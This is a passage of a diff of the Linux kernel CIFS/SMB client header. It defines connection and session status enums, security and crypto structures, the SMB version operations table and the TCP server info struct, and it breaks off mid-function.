+- * CIFS vfs client Status information (based on what we know.)
+- */
+-
+-/* associated with each connection */
+-enum statusEnum {
+-	CifsNew = 0,
+-	CifsGood,
+-	CifsExiting,
+-	CifsNeedReconnect,
+-	CifsNeedNegotiate,
+-	CifsInNegotiate,
+-};
+-
+-/* associated with each smb session */
+-enum ses_status_enum {
+-	SES_NEW = 0,
+-	SES_GOOD,
+-	SES_EXITING,
+-	SES_NEED_RECON,
+-	SES_IN_SETUP
+-};
+-
+-/* associated with each tree connection to the server */
+-enum tid_status_enum {
+-	TID_NEW = 0,
+-	TID_GOOD,
+-	TID_EXITING,
+-	TID_NEED_RECON,
+-	TID_NEED_TCON,
+-	TID_IN_TCON,
+-	TID_NEED_FILES_INVALIDATE, /* currently unused */
+-	TID_IN_FILES_INVALIDATE
+-};
+-
+-enum securityEnum {
+-	Unspecified = 0,	/* not specified */
+-	NTLMv2,			/* Legacy NTLM auth with NTLMv2 hash */
+-	RawNTLMSSP,		/* NTLMSSP without SPNEGO, NTLMv2 hash */
+-	Kerberos,		/* Kerberos via SPNEGO */
+-};
+-
+-struct session_key {
+-	unsigned int len;
+-	char *response;
+-};
+-
+-/* crypto hashing related structure/fields, not specific to a sec mech */
+-struct cifs_secmech {
+-	struct shash_desc *hmacmd5; /* hmacmd5 hash function, for NTLMv2/CR1 hashes */
+-	struct shash_desc *md5; /* md5 hash function, for CIFS/SMB1 signatures */
+-	struct shash_desc *hmacsha256; /* hmac-sha256 hash function, for SMB2 signatures */
+-	struct shash_desc *sha512; /* sha512 hash function, for SMB3.1.1 preauth hash */
+-	struct shash_desc *aes_cmac; /* block-cipher based MAC function, for SMB3 signatures */
+-
+-	struct crypto_aead *enc; /* smb3 encryption AEAD TFM (AES-CCM and AES-GCM) */
+-	struct crypto_aead *dec; /* smb3 decryption AEAD TFM (AES-CCM and AES-GCM) */
+-};
+-
+-/* per smb session structure/fields */
+-struct ntlmssp_auth {
+-	bool sesskey_per_smbsess; /* whether session key is per smb session */
+-	__u32 client_flags; /* sent by client in type 1 ntlmsssp exchange */
+-	__u32 server_flags; /* sent by server in type 2 ntlmssp exchange */
+-	unsigned char ciphertext[CIFS_CPHTXT_SIZE]; /* sent to server */
+-	char cryptkey[CIFS_CRYPTO_KEY_SIZE]; /* used by ntlmssp */
+-};
+-
+-struct cifs_cred {
+-	int uid;
+-	int gid;
+-	int mode;
+-	int cecount;
+-	struct cifs_sid osid;
+-	struct cifs_sid gsid;
+-	struct cifs_ntace *ntaces;
+-	struct cifs_ace *aces;
+-};
+-
+-struct cifs_open_info_data {
+-	char *symlink_target;
+-	union {
+-		struct smb2_file_all_info fi;
+-		struct smb311_posix_qinfo posix_fi;
+-	};
+-};
+-
+-static inline void cifs_free_open_info(struct cifs_open_info_data *data)
+-{
+-	kfree(data->symlink_target);
+-}
+-
+-/*
+- *****************************************************************
+- * Except the CIFS PDUs themselves all the
+- * globally interesting structs should go here
+- *****************************************************************
+- */
+-
+-/*
+- * A smb_rqst represents a complete request to be issued to a server. It's
+- * formed by a kvec array, followed by an array of pages. Page data is assumed
+- * to start at the beginning of the first page.
+- */
+-struct smb_rqst {
+-	struct kvec	*rq_iov;	/* array of kvecs */
+-	unsigned int	rq_nvec;	/* number of kvecs in array */
+-	struct page	**rq_pages;	/* pointer to array of page ptrs */
+-	unsigned int	rq_offset;	/* the offset to the 1st page */
+-	unsigned int	rq_npages;	/* number pages in array */
+-	unsigned int	rq_pagesz;	/* page size to use */
+-	unsigned int	rq_tailsz;	/* length of last page */
+-};
+-
+-struct mid_q_entry;
+-struct TCP_Server_Info;
+-struct cifsFileInfo;
+-struct cifs_ses;
+-struct cifs_tcon;
+-struct dfs_info3_param;
+-struct cifs_fattr;
+-struct smb3_fs_context;
+-struct cifs_fid;
+-struct cifs_readdata;
+-struct cifs_writedata;
+-struct cifs_io_parms;
+-struct cifs_search_info;
+-struct cifsInodeInfo;
+-struct cifs_open_parms;
+-struct cifs_credits;
+-
+-struct smb_version_operations {
+-	int (*send_cancel)(struct TCP_Server_Info *, struct smb_rqst *,
+-			   struct mid_q_entry *);
+-	bool (*compare_fids)(struct cifsFileInfo *, struct cifsFileInfo *);
+-	/* setup request: allocate mid, sign message */
+-	struct mid_q_entry *(*setup_request)(struct cifs_ses *,
+-					     struct TCP_Server_Info *,
+-					     struct smb_rqst *);
+-	/* setup async request: allocate mid, sign message */
+-	struct mid_q_entry *(*setup_async_request)(struct TCP_Server_Info *,
+-						struct smb_rqst *);
+-	/* check response: verify signature, map error */
+-	int (*check_receive)(struct mid_q_entry *, struct TCP_Server_Info *,
+-			     bool);
+-	void (*add_credits)(struct TCP_Server_Info *server,
+-			    const struct cifs_credits *credits,
+-			    const int optype);
+-	void (*set_credits)(struct TCP_Server_Info *, const int);
+-	int * (*get_credits_field)(struct TCP_Server_Info *, const int);
+-	unsigned int (*get_credits)(struct mid_q_entry *);
+-	__u64 (*get_next_mid)(struct TCP_Server_Info *);
+-	void (*revert_current_mid)(struct TCP_Server_Info *server,
+-				   const unsigned int val);
+-	/* data offset from read response message */
+-	unsigned int (*read_data_offset)(char *);
+-	/*
+-	 * Data length from read response message
+-	 * When in_remaining is true, the returned data length is in
+-	 * message field DataRemaining for out-of-band data read (e.g through
+-	 * Memory Registration RDMA write in SMBD).
+-	 * Otherwise, the returned data length is in message field DataLength.
+-	 */
+-	unsigned int (*read_data_length)(char *, bool in_remaining);
+-	/* map smb to linux error */
+-	int (*map_error)(char *, bool);
+-	/* find mid corresponding to the response message */
+-	struct mid_q_entry * (*find_mid)(struct TCP_Server_Info *, char *);
+-	void (*dump_detail)(void *buf, struct TCP_Server_Info *ptcp_info);
+-	void (*clear_stats)(struct cifs_tcon *);
+-	void (*print_stats)(struct seq_file *m, struct cifs_tcon *);
+-	void (*dump_share_caps)(struct seq_file *, struct cifs_tcon *);
+-	/* verify the message */
+-	int (*check_message)(char *, unsigned int, struct TCP_Server_Info *);
+-	bool (*is_oplock_break)(char *, struct TCP_Server_Info *);
+-	int (*handle_cancelled_mid)(struct mid_q_entry *, struct TCP_Server_Info *);
+-	void (*downgrade_oplock)(struct TCP_Server_Info *server,
+-				 struct cifsInodeInfo *cinode, __u32 oplock,
+-				 unsigned int epoch, bool *purge_cache);
+-	/* process transaction2 response */
+-	bool (*check_trans2)(struct mid_q_entry *, struct TCP_Server_Info *,
+-			     char *, int);
+-	/* check if we need to negotiate */
+-	bool (*need_neg)(struct TCP_Server_Info *);
+-	/* negotiate to the server */
+-	int (*negotiate)(const unsigned int xid,
+-			 struct cifs_ses *ses,
+-			 struct TCP_Server_Info *server);
+-	/* set negotiated write size */
+-	unsigned int (*negotiate_wsize)(struct cifs_tcon *tcon, struct smb3_fs_context *ctx);
+-	/* set negotiated read size */
+-	unsigned int (*negotiate_rsize)(struct cifs_tcon *tcon, struct smb3_fs_context *ctx);
+-	/* setup smb sessionn */
+-	int (*sess_setup)(const unsigned int, struct cifs_ses *,
+-			  struct TCP_Server_Info *server,
+-			  const struct nls_table *);
+-	/* close smb session */
+-	int (*logoff)(const unsigned int, struct cifs_ses *);
+-	/* connect to a server share */
+-	int (*tree_connect)(const unsigned int, struct cifs_ses *, const char *,
+-			    struct cifs_tcon *, const struct nls_table *);
+-	/* close tree connecion */
+-	int (*tree_disconnect)(const unsigned int, struct cifs_tcon *);
+-	/* get DFS referrals */
+-	int (*get_dfs_refer)(const unsigned int, struct cifs_ses *,
+-			     const char *, struct dfs_info3_param **,
+-			     unsigned int *, const struct nls_table *, int);
+-	/* informational QFS call */
+-	void (*qfs_tcon)(const unsigned int, struct cifs_tcon *,
+-			 struct cifs_sb_info *);
+-	/* check if a path is accessible or not */
+-	int (*is_path_accessible)(const unsigned int, struct cifs_tcon *,
+-				  struct cifs_sb_info *, const char *);
+-	/* query path data from the server */
+-	int (*query_path_info)(const unsigned int xid, struct cifs_tcon *tcon,
+-			       struct cifs_sb_info *cifs_sb, const char *full_path,
+-			       struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse);
+-	/* query file data from the server */
+-	int (*query_file_info)(const unsigned int xid, struct cifs_tcon *tcon,
+-			       struct cifsFileInfo *cfile, struct cifs_open_info_data *data);
+-	/* query reparse tag from srv to determine which type of special file */
+-	int (*query_reparse_tag)(const unsigned int xid, struct cifs_tcon *tcon,
+-				struct cifs_sb_info *cifs_sb, const char *path,
+-				__u32 *reparse_tag);
+-	/* get server index number */
+-	int (*get_srv_inum)(const unsigned int xid, struct cifs_tcon *tcon,
+-			    struct cifs_sb_info *cifs_sb, const char *full_path, u64 *uniqueid,
+-			    struct cifs_open_info_data *data);
+-	/* set size by path */
+-	int (*set_path_size)(const unsigned int, struct cifs_tcon *,
+-			     const char *, __u64, struct cifs_sb_info *, bool);
+-	/* set size by file handle */
+-	int (*set_file_size)(const unsigned int, struct cifs_tcon *,
+-			     struct cifsFileInfo *, __u64, bool);
+-	/* set attributes */
+-	int (*set_file_info)(struct inode *, const char *, FILE_BASIC_INFO *,
+-			     const unsigned int);
+-	int (*set_compression)(const unsigned int, struct cifs_tcon *,
+-			       struct cifsFileInfo *);
+-	/* check if we can send an echo or nor */
+-	bool (*can_echo)(struct TCP_Server_Info *);
+-	/* send echo request */
+-	int (*echo)(struct TCP_Server_Info *);
+-	/* create directory */
+-	int (*posix_mkdir)(const unsigned int xid, struct inode *inode,
+-			umode_t mode, struct cifs_tcon *tcon,
+-			const char *full_path,
+-			struct cifs_sb_info *cifs_sb);
+-	int (*mkdir)(const unsigned int xid, struct inode *inode, umode_t mode,
+-		     struct cifs_tcon *tcon, const char *name,
+-		     struct cifs_sb_info *sb);
+-	/* set info on created directory */
+-	void (*mkdir_setinfo)(struct inode *, const char *,
+-			      struct cifs_sb_info *, struct cifs_tcon *,
+-			      const unsigned int);
+-	/* remove directory */
+-	int (*rmdir)(const unsigned int, struct cifs_tcon *, const char *,
+-		     struct cifs_sb_info *);
+-	/* unlink file */
+-	int (*unlink)(const unsigned int, struct cifs_tcon *, const char *,
+-		      struct cifs_sb_info *);
+-	/* open, rename and delete file */
+-	int (*rename_pending_delete)(const char *, struct dentry *,
+-				     const unsigned int);
+-	/* send rename request */
+-	int (*rename)(const unsigned int, struct cifs_tcon *, const char *,
+-		      const char *, struct cifs_sb_info *);
+-	/* send create hardlink request */
+-	int (*create_hardlink)(const unsigned int, struct cifs_tcon *,
+-			       const char *, const char *,
+-			       struct cifs_sb_info *);
+-	/* query symlink target */
+-	int (*query_symlink)(const unsigned int, struct cifs_tcon *,
+-			     struct cifs_sb_info *, const char *,
+-			     char **, bool);
+-	/* open a file for non-posix mounts */
+-	int (*open)(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock,
+-		    void *buf);
+-	/* set fid protocol-specific info */
+-	void (*set_fid)(struct cifsFileInfo *, struct cifs_fid *, __u32);
+-	/* close a file */
+-	void (*close)(const unsigned int, struct cifs_tcon *,
+-		      struct cifs_fid *);
+-	/* close a file, returning file attributes and timestamps */
+-	void (*close_getattr)(const unsigned int xid, struct cifs_tcon *tcon,
+-		      struct cifsFileInfo *pfile_info);
+-	/* send a flush request to the server */
+-	int (*flush)(const unsigned int, struct cifs_tcon *, struct cifs_fid *);
+-	/* async read from the server */
+-	int (*async_readv)(struct cifs_readdata *);
+-	/* async write to the server */
+-	int (*async_writev)(struct cifs_writedata *,
+-			    void (*release)(struct kref *));
+-	/* sync read from the server */
+-	int (*sync_read)(const unsigned int, struct cifs_fid *,
+-			 struct cifs_io_parms *, unsigned int *, char **,
+-			 int *);
+-	/* sync write to the server */
+-	int (*sync_write)(const unsigned int, struct cifs_fid *,
+-			  struct cifs_io_parms *, unsigned int *, struct kvec *,
+-			  unsigned long);
+-	/* open dir, start readdir */
+-	int (*query_dir_first)(const unsigned int, struct cifs_tcon *,
+-			       const char *, struct cifs_sb_info *,
+-			       struct cifs_fid *, __u16,
+-			       struct cifs_search_info *);
+-	/* continue readdir */
+-	int (*query_dir_next)(const unsigned int, struct cifs_tcon *,
+-			      struct cifs_fid *,
+-			      __u16, struct cifs_search_info *srch_inf);
+-	/* close dir */
+-	int (*close_dir)(const unsigned int, struct cifs_tcon *,
+-			 struct cifs_fid *);
+-	/* calculate a size of SMB message */
+-	unsigned int (*calc_smb_size)(void *buf);
+-	/* check for STATUS_PENDING and process the response if yes */
+-	bool (*is_status_pending)(char *buf, struct TCP_Server_Info *server);
+-	/* check for STATUS_NETWORK_SESSION_EXPIRED */
+-	bool (*is_session_expired)(char *);
+-	/* send oplock break response */
+-	int (*oplock_response)(struct cifs_tcon *tcon, __u64 persistent_fid, __u64 volatile_fid,
+-			__u16 net_fid, struct cifsInodeInfo *cifs_inode);
+-	/* query remote filesystem */
+-	int (*queryfs)(const unsigned int, struct cifs_tcon *,
+-		       struct cifs_sb_info *, struct kstatfs *);
+-	/* send mandatory brlock to the server */
+-	int (*mand_lock)(const unsigned int, struct cifsFileInfo *, __u64,
+-			 __u64, __u32, int, int, bool);
+-	/* unlock range of mandatory locks */
+-	int (*mand_unlock_range)(struct cifsFileInfo *, struct file_lock *,
+-				 const unsigned int);
+-	/* push brlocks from the cache to the server */
+-	int (*push_mand_locks)(struct cifsFileInfo *);
+-	/* get lease key of the inode */
+-	void (*get_lease_key)(struct inode *, struct cifs_fid *);
+-	/* set lease key of the inode */
+-	void (*set_lease_key)(struct inode *, struct cifs_fid *);
+-	/* generate new lease key */
+-	void (*new_lease_key)(struct cifs_fid *);
+-	int (*generate_signingkey)(struct cifs_ses *ses,
+-				   struct TCP_Server_Info *server);
+-	int (*calc_signature)(struct smb_rqst *, struct TCP_Server_Info *,
+-				bool allocate_crypto);
+-	int (*set_integrity)(const unsigned int, struct cifs_tcon *tcon,
+-			     struct cifsFileInfo *src_file);
+-	int (*enum_snapshots)(const unsigned int xid, struct cifs_tcon *tcon,
+-			     struct cifsFileInfo *src_file, void __user *);
+-	int (*notify)(const unsigned int xid, struct file *pfile,
+-			     void __user *pbuf, bool return_changes);
+-	int (*query_mf_symlink)(unsigned int, struct cifs_tcon *,
+-				struct cifs_sb_info *, const unsigned char *,
+-				char *, unsigned int *);
+-	int (*create_mf_symlink)(unsigned int, struct cifs_tcon *,
+-				 struct cifs_sb_info *, const unsigned char *,
+-				 char *, unsigned int *);
+-	/* if we can do cache read operations */
+-	bool (*is_read_op)(__u32);
+-	/* set oplock level for the inode */
+-	void (*set_oplock_level)(struct cifsInodeInfo *, __u32, unsigned int,
+-				 bool *);
+-	/* create lease context buffer for CREATE request */
+-	char * (*create_lease_buf)(u8 *lease_key, u8 oplock);
+-	/* parse lease context buffer and return oplock/epoch info */
+-	__u8 (*parse_lease_buf)(void *buf, unsigned int *epoch, char *lkey);
+-	ssize_t (*copychunk_range)(const unsigned int,
+-			struct cifsFileInfo *src_file,
+-			struct cifsFileInfo *target_file,
+-			u64 src_off, u64 len, u64 dest_off);
+-	int (*duplicate_extents)(const unsigned int, struct cifsFileInfo *src,
+-			struct cifsFileInfo *target_file, u64 src_off, u64 len,
+-			u64 dest_off);
+-	int (*validate_negotiate)(const unsigned int, struct cifs_tcon *);
+-	ssize_t (*query_all_EAs)(const unsigned int, struct cifs_tcon *,
+-			const unsigned char *, const unsigned char *, char *,
+-			size_t, struct cifs_sb_info *);
+-	int (*set_EA)(const unsigned int, struct cifs_tcon *, const char *,
+-			const char *, const void *, const __u16,
+-			const struct nls_table *, struct cifs_sb_info *);
+-	struct cifs_ntsd * (*get_acl)(struct cifs_sb_info *, struct inode *,
+-			const char *, u32 *, u32);
+-	struct cifs_ntsd * (*get_acl_by_fid)(struct cifs_sb_info *,
+-			const struct cifs_fid *, u32 *, u32);
+-	int (*set_acl)(struct cifs_ntsd *, __u32, struct inode *, const char *,
+-			int);
+-	/* writepages retry size */
+-	unsigned int (*wp_retry_size)(struct inode *);
+-	/* get mtu credits */
+-	int (*wait_mtu_credits)(struct TCP_Server_Info *, unsigned int,
+-				unsigned int *, struct cifs_credits *);
+-	/* adjust previously taken mtu credits to request size */
+-	int (*adjust_credits)(struct TCP_Server_Info *server,
+-			      struct cifs_credits *credits,
+-			      const unsigned int payload_size);
+-	/* check if we need to issue closedir */
+-	bool (*dir_needs_close)(struct cifsFileInfo *);
+-	long (*fallocate)(struct file *, struct cifs_tcon *, int, loff_t,
+-			  loff_t);
+-	/* init transform request - used for encryption for now */
+-	int (*init_transform_rq)(struct TCP_Server_Info *, int num_rqst,
+-				 struct smb_rqst *, struct smb_rqst *);
+-	int (*is_transform_hdr)(void *buf);
+-	int (*receive_transform)(struct TCP_Server_Info *,
+-				 struct mid_q_entry **, char **, int *);
+-	enum securityEnum (*select_sectype)(struct TCP_Server_Info *,
+-			    enum securityEnum);
+-	int (*next_header)(char *);
+-	/* ioctl passthrough for query_info */
+-	int (*ioctl_query_info)(const unsigned int xid,
+-				struct cifs_tcon *tcon,
+-				struct cifs_sb_info *cifs_sb,
+-				__le16 *path, int is_dir,
+-				unsigned long p);
+-	/* make unix special files (block, char, fifo, socket) */
+-	int (*make_node)(unsigned int xid,
+-			 struct inode *inode,
+-			 struct dentry *dentry,
+-			 struct cifs_tcon *tcon,
+-			 const char *full_path,
+-			 umode_t mode,
+-			 dev_t device_number);
+-	/* version specific fiemap implementation */
+-	int (*fiemap)(struct cifs_tcon *tcon, struct cifsFileInfo *,
+-		      struct fiemap_extent_info *, u64, u64);
+-	/* version specific llseek implementation */
+-	loff_t (*llseek)(struct file *, struct cifs_tcon *, loff_t, int);
+-	/* Check for STATUS_IO_TIMEOUT */
+-	bool (*is_status_io_timeout)(char *buf);
+-	/* Check for STATUS_NETWORK_NAME_DELETED */
+-	void (*is_network_name_deleted)(char *buf, struct TCP_Server_Info *srv);
+-};
+-
+-struct smb_version_values {
+-	char		*version_string;
+-	__u16		protocol_id;
+-	__u32		req_capabilities;
+-	__u32		large_lock_type;
+-	__u32		exclusive_lock_type;
+-	__u32		shared_lock_type;
+-	__u32		unlock_lock_type;
+-	size_t		header_preamble_size;
+-	size_t		header_size;
+-	size_t		max_header_size;
+-	size_t		read_rsp_size;
+-	__le16		lock_cmd;
+-	unsigned int	cap_unix;
+-	unsigned int	cap_nt_find;
+-	unsigned int	cap_large_files;
+-	__u16		signing_enabled;
+-	__u16		signing_required;
+-	size_t		create_lease_size;
+-};
+-
+-#define HEADER_SIZE(server) (server->vals->header_size)
+-#define MAX_HEADER_SIZE(server) (server->vals->max_header_size)
+-#define HEADER_PREAMBLE_SIZE(server) (server->vals->header_preamble_size)
+-#define MID_HEADER_SIZE(server) (HEADER_SIZE(server) - 1 - HEADER_PREAMBLE_SIZE(server))
+-
+-/**
+- * CIFS superblock mount flags (mnt_cifs_flags) to consider when
+- * trying to reuse existing superblock for a new mount
+- */
+-#define CIFS_MOUNT_MASK (CIFS_MOUNT_NO_PERM | CIFS_MOUNT_SET_UID | \
+-			 CIFS_MOUNT_SERVER_INUM | CIFS_MOUNT_DIRECT_IO | \
+-			 CIFS_MOUNT_NO_XATTR | CIFS_MOUNT_MAP_SPECIAL_CHR | \
+-			 CIFS_MOUNT_MAP_SFM_CHR | \
+-			 CIFS_MOUNT_UNX_EMUL | CIFS_MOUNT_NO_BRL | \
+-			 CIFS_MOUNT_CIFS_ACL | CIFS_MOUNT_OVERR_UID | \
+-			 CIFS_MOUNT_OVERR_GID | CIFS_MOUNT_DYNPERM | \
+-			 CIFS_MOUNT_NOPOSIXBRL | CIFS_MOUNT_NOSSYNC | \
+-			 CIFS_MOUNT_FSCACHE | CIFS_MOUNT_MF_SYMLINKS | \
+-			 CIFS_MOUNT_MULTIUSER | CIFS_MOUNT_STRICT_IO | \
+-			 CIFS_MOUNT_CIFS_BACKUPUID | CIFS_MOUNT_CIFS_BACKUPGID | \
+-			 CIFS_MOUNT_UID_FROM_ACL | CIFS_MOUNT_NO_HANDLE_CACHE | \
+-			 CIFS_MOUNT_NO_DFS | CIFS_MOUNT_MODE_FROM_SID | \
+-			 CIFS_MOUNT_RO_CACHE | CIFS_MOUNT_RW_CACHE)
+-
+-/**
+- * Generic VFS superblock mount flags (s_flags) to consider when
+- * trying to reuse existing superblock for a new mount
+- */
+-#define CIFS_MS_MASK (SB_RDONLY | SB_MANDLOCK | SB_NOEXEC | SB_NOSUID | \
+-		      SB_NODEV | SB_SYNCHRONOUS)
+-
+-struct cifs_mnt_data {
+-	struct cifs_sb_info *cifs_sb;
+-	struct smb3_fs_context *ctx;
+-	int flags;
+-};
+-
+-static inline unsigned int
+-get_rfc1002_length(void *buf)
+-{
+-	return be32_to_cpu(*((__be32 *)buf)) & 0xffffff;
+-}
+-
+-static inline void
+-inc_rfc1001_len(void *buf, int count)
+-{
+-	be32_add_cpu((__be32 *)buf, count);
+-}
+-
+-struct TCP_Server_Info {
+-	struct list_head tcp_ses_list;
+-	struct list_head smb_ses_list;
+-	spinlock_t srv_lock;  /* protect anything here that is not protected */
+-	__u64 conn_id; /* connection identifier (useful for debugging) */
+-	int srv_count; /* reference counter */
+-	/* 15 character server name + 0x20 16th byte indicating type = srv */
+-	char server_RFC1001_name[RFC1001_NAME_LEN_WITH_NULL];
+-	struct smb_version_operations	*ops;
+-	struct smb_version_values	*vals;
+-	/* updates to tcpStatus protected by cifs_tcp_ses_lock */
+-	enum statusEnum tcpStatus; /* what we think the status is */
+-	char *hostname; /* hostname portion of UNC string */
+-	struct socket *ssocket;
+-	struct sockaddr_storage dstaddr;
+-	struct sockaddr_storage srcaddr; /* locally bind to this IP */
+-#ifdef CONFIG_NET_NS
+-	struct net *net;
+-#endif
+-	wait_queue_head_t response_q;
+-	wait_queue_head_t request_q; /* if more than maxmpx to srvr must block*/
+-	spinlock_t mid_lock;  /* protect mid queue and it's entries */
+-	struct list_head pending_mid_q;
+-	bool noblocksnd;		/* use blocking sendmsg */
+-	bool noautotune;		/* do not autotune send buf sizes */
+-	bool nosharesock;
+-	bool tcp_nodelay;
+-	unsigned int credits;  /* send no more requests at once */
+-	unsigned int max_credits; /* can override large 32000 default at mnt */
+-	unsigned int in_flight;  /* number of requests on the wire to server */
+-	unsigned int max_in_flight; /* max number of requests that were on wire */
+-	spinlock_t req_lock;  /* protect the two values above */
+-	struct mutex _srv_mutex;
+-	unsigned int nofs_flag;
+-	struct task_struct *tsk;
+-	char server_GUID[16];
+-	__u16 sec_mode;
+-	bool sign; /* is signing enabled on this connection? */
+-	bool ignore_signature:1; /* skip validation of signatures in SMB2/3 rsp */
+-	bool session_estab; /* mark when very first sess is established */
+-	int echo_credits;  /* echo reserved slots */
+-	int oplock_credits;  /* oplock break reserved slots */
+-	bool echoes:1; /* enable echoes */
+-	__u8 client_guid[SMB2_CLIENT_GUID_SIZE]; /* Client GUID */
+-	u16 dialect; /* dialect index that server chose */
+-	bool oplocks:1; /* enable oplocks */
+-	unsigned int maxReq;	/* Clients should submit no more */
+-	/* than maxReq distinct unanswered SMBs to the server when using  */
+-	/* multiplexed reads or writes (for SMB1/CIFS only, not SMB2/SMB3) */
+-	unsigned int maxBuf;	/* maxBuf specifies the maximum */
+-	/* message size the server can send or receive for non-raw SMBs */
+-	/* maxBuf is returned by SMB NegotiateProtocol so maxBuf is only 0 */
+-	/* when socket is setup (and during reconnect) before NegProt sent */
+-	unsigned int max_rw;	/* maxRw specifies the maximum */
+-	/* message size the server can send or receive for */
+-	/* SMB_COM_WRITE_RAW or SMB_COM_READ_RAW. */
+-	unsigned int capabilities; /* selective disabling of caps by smb sess */
+-	int timeAdj;  /* Adjust for difference in server time zone in sec */
+-	__u64 CurrentMid;         /* multiplex id - rotating counter, protected by GlobalMid_Lock */
+-	char cryptkey[CIFS_CRYPTO_KEY_SIZE]; /* used by ntlm, ntlmv2 etc */
+-	/* 16th byte of RFC1001 workstation name is always null */
+-	char workstation_RFC1001_name[RFC1001_NAME_LEN_WITH_NULL];
+-	__u32 sequence_number; /* for signing, protected by srv_mutex */
+-	__u32 reconnect_instance; /* incremented on each reconnect */
+-	struct session_key session_key;
+-	unsigned long lstrp; /* when we got last response from this server */
+-	struct cifs_secmech secmech; /* crypto sec mech functs, descriptors */
+-#define	CIFS_NEGFLAVOR_UNENCAP	1	/* wct == 17, but no ext_sec */
+-#define	CIFS_NEGFLAVOR_EXTENDED	2	/* wct == 17, ext_sec bit set */
+-	char	negflavor;	/* NEGOTIATE response flavor */
+-	/* extended security flavors that server supports */
+-	bool	sec_ntlmssp;		/* supports NTLMSSP */
+-	bool	sec_kerberosu2u;	/* supports U2U Kerberos */
+-	bool	sec_kerberos;		/* supports plain Kerberos */
+-	bool	sec_mskerberos;		/* supports legacy MS Kerberos */
+-	bool	large_buf;		/* is current buffer large? */
+-	/* use SMBD connection instead of socket */
+-	bool	rdma;
+-	/* point to the SMBD connection if RDMA is used instead of socket */
+-	struct smbd_connection *smbd_conn;
+-	struct delayed_work	echo; /* echo ping workqueue job */
+-	struct delayed_work	resolve; /* dns resolution workqueue job */
+-	char	*smallbuf;	/* pointer to current "small" buffer */
+-	char	*bigbuf;	/* pointer to current "big" buffer */
+-	/* Total size of this PDU. Only valid from cifs_demultiplex_thread */
+-	unsigned int pdu_size;
+-	unsigned int total_read; /* total amount of data read in this pass */
+-	atomic_t in_send; /* requests trying to send */
+-	atomic_t num_waiters;   /* blocked waiting to get in sendrecv */
+-#ifdef CONFIG_CIFS_STATS2
+-	atomic_t num_cmds[NUMBER_OF_SMB2_COMMANDS]; /* total requests by cmd */
+-	atomic_t smb2slowcmd[NUMBER_OF_SMB2_COMMANDS]; /* count resps > 1 sec */
+-	__u64 time_per_cmd[NUMBER_OF_SMB2_COMMANDS]; /* total time per cmd */
+-	__u32 slowest_cmd[NUMBER_OF_SMB2_COMMANDS];
+-	__u32 fastest_cmd[NUMBER_OF_SMB2_COMMANDS];
+-#endif /* STATS2 */
+-	unsigned int	max_read;
+-	unsigned int	max_write;
+-	unsigned int	min_offload;
+-	__le16	compress_algorithm;
+-	__u16	signing_algorithm;
+-	__le16	cipher_type;
+-	 /* save initital negprot hash */
+-	__u8	preauth_sha_hash[SMB2_PREAUTH_HASH_SIZE];
+-	bool	signing_negotiated; /* true if valid signing context rcvd from server */
+-	bool	posix_ext_supported;
+-	struct delayed_work reconnect; /* reconnect workqueue job */
+-	struct mutex reconnect_mutex; /* prevent simultaneous reconnects */
+-	unsigned long echo_interval;
+-
+-	/*
+-	 * Number of targets available for reconnect. The more targets
+-	 * the more tasks have to wait to let the demultiplex thread
+-	 * reconnect.
+-	 */
+-	int nr_targets;
+-	bool noblockcnt; /* use non-blocking connect() */
+-
+-	/*
+-	 * If this is a session channel,
+-	 * primary_server holds the ref-counted
+-	 * pointer to primary channel connection for the session.
+-	 */
+-#define CIFS_SERVER_IS_CHAN(server)	(!!(server)->primary_server)
+-	struct TCP_Server_Info *primary_server;
+-
+-#ifdef CONFIG_CIFS_SWN_UPCALL
+-	bool use_swn_dstaddr;
+-	struct sockaddr_storage swn_dstaddr;
+-#endif
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	bool is_dfs_conn; /* if a dfs connection */
+-	struct mutex refpath_lock; /* protects leaf_fullpath */
+-	/*
+-	 * Canonical DFS full paths that were used to chase referrals in mount and reconnect.
+-	 *
+-	 * origin_fullpath: first or original referral path
+-	 * leaf_fullpath: last referral path (might be changed due to nested links in reconnect)
+-	 *
+-	 * current_fullpath: pointer to either origin_fullpath or leaf_fullpath
+-	 * NOTE: cannot be accessed outside cifs_reconnect() and smb2_reconnect()
+-	 *
+-	 * format: \\HOST\SHARE\[OPTIONAL PATH]
+-	 */
+-	char *origin_fullpath, *leaf_fullpath, *current_fullpath;
+-#endif
+-};
+-
+-static inline bool is_smb1(struct TCP_Server_Info *server)
+-{
+-	return HEADER_PREAMBLE_SIZE(server) != 0;
+-}
+-
+-static inline void cifs_server_lock(struct TCP_Server_Info *server)
+-{
+-	unsigned int nofs_flag = memalloc_nofs_save();
+-
+-	mutex_lock(&server->_srv_mutex);
+-	server->nofs_flag = nofs_flag;
+-}
+-
+-static inline void cifs_server_unlock(struct TCP_Server_Info *server)
+-{
+-	unsigned int nofs_flag = server->nofs_flag;
+-
+-	mutex_unlock(&server->_srv_mutex);
+-	memalloc_nofs_restore(nofs_flag);
+-}
+-
+-struct cifs_credits {
+-	unsigned int value;
+-	unsigned int instance;
+-};
+-
+-static inline unsigned int
+-in_flight(struct TCP_Server_Info *server)
+-{
+-	unsigned int num;
+-	spin_lock(&server->req_lock);
+-	num = server->in_flight;
+-	spin_unlock(&server->req_lock);
+-	return num;
+-}
+-
+-static inline bool
+-has_credits(struct TCP_Server_Info *server, int *credits, int num_credits)
+-{
+-	int num;
+-	spin_lock(&server->req_lock);
+-	num = *credits;
+-	spin_unlock(&server->req_lock);
+-	return num >= num_credits;
+-}
+-
+-static inline void
+-add_credits(struct TCP_Server_Info *server, const struct cifs_credits *credits,
+-	    const int optype)
+-{
+-	server->ops->add_credits(server, credits, optype);
+-}
+-
+-static inline void
+-add_credits_and_wake_if(struct TCP_Server_Info *server,
+-			const struct cifs_credits *credits, const int optype)
+-{
+-	if (credits->value) {
+-		server->ops->add_credits(server, credits, optype);
+-		wake_up(&server->request_q);
+-	}
+-}
+-
+-static inline void
+-set_credits(struct TCP_Server_Info *server, const int val)
+-{
+-	server->ops->set_credits(server, val);
+-}
+-
+-static inline int
+-adjust_credits(struct TCP_Server_Info *server, struct cifs_credits *credits,
+-	       const unsigned int payload_size)
+-{
+-	return server->ops->adjust_credits ?
+-		server->ops->adjust_credits(server, credits, payload_size) : 0;
+-}
+-
+-static inline __le64
+-get_next_mid64(struct TCP_Server_Info *server)
+-{
+-	return cpu_to_le64(server->ops->get_next_mid(server));
+-}
+-
+-static inline __le16
+-get_next_mid(struct TCP_Server_Info *server)
+-{
